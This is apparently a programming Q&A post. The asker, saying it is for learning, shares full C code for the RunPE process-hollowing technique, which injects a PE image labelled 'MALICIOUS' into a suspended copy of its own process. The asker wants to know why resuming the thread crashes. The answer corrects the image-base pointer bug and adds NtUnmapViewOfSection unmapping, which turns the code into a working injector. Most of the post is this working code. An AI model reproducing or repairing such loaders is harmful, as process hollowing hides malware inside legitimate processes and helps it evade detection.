# Why I get 0xc00000005?

Tags: c, portable-executable

I'm trying to use RunPE technique (For learning).

First, I tried it on Windows XP(32-bit) and no error occurs but, the injected code for(HelloWorld) didn't run.

Then, I tried to use it on Windows 7 and 10 (64-bit) and get this error[0xc00000005] when the thread resumed. Why I get this error and why the injected code didn't run on the XP machine?

I tried also to unmap the imagebase(0x00400000) but I had the same problem.

my code:

```
int runPe(void* image) {

IMAGE_DOS_HEADER* dosHeader;
IMAGE_NT_HEADERS* ntHeader;
IMAGE_SECTION_HEADER* sectionHeader;
CONTEXT* ctx;

PROCESS_INFORMATION pinfo;
STARTUPINFO sinfo;


int i;
DWORD* ImageBase = NULL;
void* pImage = NULL;
char currentpath[1024];

GetModuleFileNameA(0, currentpath, 1024);       //path to the current exe

//Identifying the MALICIOUS IMAGE HEADERS
dosHeader = (PIMAGE_DOS_HEADER)(image);
ntHeader = (PIMAGE_NT_HEADERS)((DWORD)image + dosHeader->e_lfanew);

//Checks if this is a PE FILE
if (ntHeader->Signature == IMAGE_NT_SIGNATURE) {

    ZeroMemory(&pinfo, sizeof(pinfo));
    ZeroMemory(&sinfo, sizeof(sinfo));

    if (CreateProcessA(currentpath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &sinfo, &pinfo)) {
        printf("[*] Suspended process is created\n");
        Sleep(600);

        //Allocate memory for the context of suspended process
        ctx = (LPCONTEXT)(VirtualAlloc(NULL, sizeof(ctx), MEM_COMMIT, PAGE_READWRITE));
        if (ctx) {
            ctx->ContextFlags = CONTEXT_FULL;
            printf("[*] Context is allocated successfully\n");
            Sleep(600);
            
            //Get the thread context
            if (GetThreadContext(pinfo.hThread, (LPCONTEXT)ctx)) {
                printf("[*] Allocating MALICIOUS image headers into the suspended process\n");
                Sleep(600);

                ReadProcessMemory(pinfo.hProcess,(LPCVOID)(ctx->Ebx + 8), (LPVOID)(&ImageBase), 4, 0);

                pImage = VirtualAllocEx(pinfo.hProcess, NULL,
                    ntHeader->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

                if (pImage) {
                    printf("[*] Allocating memory for MALICIOUS image headers into the IMAGE_BASE\n");
                    Sleep(600);

                    //Writing the image intor the process address space
                    if (WriteProcessMemory(pinfo.hProcess, (LPVOID)pImage, image, ntHeader->OptionalHeader.SizeOfHeaders, NULL)) {
                        printf("[*] Writing memory for MALICIOUS image headers into the IMAGE_BASE\n");
                        Sleep(600);

                        //sectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)image + dosHeader->e_lfanew + sizeof(IMAGE_NT_HEADERS));
                        for (i = 0; i < ntHeader->FileHeader.NumberOfSections; i++)
                        {

                            sectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)image + dosHeader->e_lfanew + 248 + (i * sizeof(IMAGE_SECTION_HEADER)));
                            if (sectionHeader->SizeOfRawData == 00000000)
                                continue;

                            if (WriteProcessMemory(pinfo.hProcess, (LPVOID)((DWORD)(pImage) + sectionHeader->VirtualAddress),
                                (LPVOID)((DWORD)image + sectionHeader->PointerToRawData), sectionHeader->SizeOfRawData, 0))
                            {
                                printf("[*] Allocating memory for Section %d at %X\n", i, (LPVOID)((DWORD)pImage + sectionHeader->VirtualAddress));
                                Sleep(600);
                            }
                            else
                            {
                                printf("ERROR: Writing section (%d) into memory failed\n", i);
                                printf("Error Code: %d\n", GetLastError());
                                return -1;
                            }
                        }

                        //Change the imageBase address from the suspened process into the MALICIOUS
                        if (WriteProcessMemory(pinfo.hProcess, (LPVOID)(ctx->Ebx + 8), (LPVOID)(ntHeader->OptionalHeader.ImageBase), 4, 0)) {
                            printf("[*] Image base address is changed to MALICIOUS\n");
                            Sleep(600);

                            //Now we will move the address of entrypoint to the MALCIOUS image
                            // At EAX register
                            ctx->Eax = (DWORD)pImage + ntHeader->OptionalHeader.AddressOfEntryPoint;
                            printf("[*] AddressOfEntryPoint is changed to MALICIOUS\n");
                            Sleep(600);
                            
                            //Set Thread Context and resume it
                            SetThreadContext(pinfo.hThread, (LPCONTEXT)ctx);
                            ResumeThread(pinfo.hThread);
                            printf("[*] Thread is resumed\n");
                        }

                        else
                        {
                            printf("ERROR: Change the imageBase address from the suspened process into the MALICIOUS failed\n");
                            printf("Error Code: %d\n", GetLastError());
                            return -1;
                        }
                    }
                    else
                    {
                        printf("ERROR: Writing the image into the process address space failed\n");
                        printf("Error Code: %d\n", GetLastError());
                        return -1;
                    }
        
                }
                else
                {
                    printf("ERROR: Allocating memory for MALICIOUS image headers into the IMAGE_BASE failed\n");
                    printf("Error Code: %d\n", GetLastError());
                    return -1;
                }
            }
            else
            {
                printf("ERROR: GetThreadContext failed\n");
                printf("Error Code: %d\n", GetLastError());
                return -1;
            }
        }
        else
        {
            printf("ERROR: Context allocation failed\n");
            printf("Error Code: %d\n", GetLastError());
            return -1;
        }
    }

    return 0;
}

else
{
    printf("ERROR: Invalid nt SIGNATURE\n");
    printf("Error Code: %d\n", GetLastError());
    return -1;
  }
}
```

Comment: I assume you know 0xc0000005 is a bad pointer error? You've got plenty of trace in there - can you at least tell us which of your printfs you saw to give us an idea where the crash happened? But it would be simplest for you to debug this yourself - can you step through this code in a debugger?

Comment: it happens when it calls ResumeThread, but when the last error code is Zero

Answer (score 1):

It works, I think the error in changing the imagebase address to the injected code.

I think the error is here:

```
if (WriteProcessMemory(pinfo.hProcess, (LPVOID)(ctx->Ebx + 8), (LPVOID)(ntHeader->OptionalHeader.ImageBase), 4, 0))
```

modified (The mistake is wrong pointer to imagebase buffer)

```
if (WriteProcessMemory(pinfo.hProcess, (LPVOID)(ctx->Ebx + 8), (LPVOID)(&ntHeader->OptionalHeader.ImageBase), 4, 0))
```

and unmapping the imagebase address using NtUnmapViewOfSection:

```
FARPROC fpNtUnmapViewOfSection = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection");

DWORD res = fpNtUnmapViewOfSection(pinfo.hProcess, ImageBase);
```